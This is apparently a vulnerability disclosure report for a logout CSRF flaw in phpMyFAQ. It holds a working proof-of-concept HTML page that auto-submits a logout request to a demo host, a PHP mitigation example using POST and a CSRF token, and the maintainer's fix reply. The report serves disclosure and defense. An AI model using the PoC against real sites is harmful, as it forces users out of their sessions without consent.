Cross-Site Request Forgery (CSRF) in thorsten/phpmyfaq
Valid
Reported on
Jul 26th 2022
Description
An attacker is able to log out a user if a logged-in user visits the attacker's website.
Proof of Concept
PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://roy.demo.phpmyfaq.de/?action=logout">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Impact
This vulnerability allows an attacker to force users to log out unintentionally.
More details
One way GET could be abused here is that a person (a competitor, perhaps) places an image tag with src="<your logout link>" anywhere on the internet; if a user of your site stumbles upon that page, they will be unknowingly logged out. This is why it should be a POST with a CSRF token.
Note
While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.
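The mitigation the report asks for, as an added example (not phpMyFAQ's code and not the linked fix): the logout endpoint rejects anything that is not a POST carrying a per-session CSRF token, and the token is compared in constant time. The function and field names are assumptions chosen for the example.

```php
<?php
// Added example, not phpMyFAQ code: a logout endpoint hardened against CSRF.
// SameSite=Lax keeps the session cookie off cross-site <img>/form requests
// as defense in depth; the method and token checks below are the real fix.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// Issue one random token per session; embed it in the logout form.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only for a POST whose token matches the session's token.
function isValidLogoutRequest(array $server, array $post, array $session): bool
{
    // <img src="...?action=logout"> and auto-submitted GET forms fail here.
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if ($expected === '' || !is_string($given)) {
        return false;
    }
    return hash_equals($expected, $given); // constant-time comparison
}

if (($_GET['action'] ?? '') === 'logout') {
    if (!isValidLogoutRequest($_SERVER, $_POST, $_SESSION)) {
        http_response_code(403);
        exit('Invalid logout request');
    }
    $_SESSION = [];
    session_destroy();
    header('Location: /');
    exit;
}
?>
<form method="post" action="/?action=logout">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') ?>">
  <button type="submit">Logout</button>
</form>
```

With this in place the PoC above (a GET form submission with no token) receives a 403 and the session survives.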
We are processing your report and will contact the thorsten/phpmyfaq team within 24 hours.
5 months ago
We have contacted a member of the thorsten/phpmyfaq team and are waiting to hear back.
5 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
The researcher's credibility has increased: +7
Thanks for the hint, I fixed that in the backend some months ago, but missed the one in the frontend. Here's the fix: https://github.com/thorsten/phpMyFAQ/commit/3af0bbb0856fe821ba20df22884fc7a7b95c3bcb
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
We have sent a fix follow up to the thorsten/phpmyfaq team.
We will try again in 7 days.
5 months ago
We have sent a second fix follow up to the thorsten/phpmyfaq team.
We will try again in 10 days.
5 months ago
We have sent a third and final fix follow up to the thorsten/phpmyfaq team.
This report is now considered stale.
5 months ago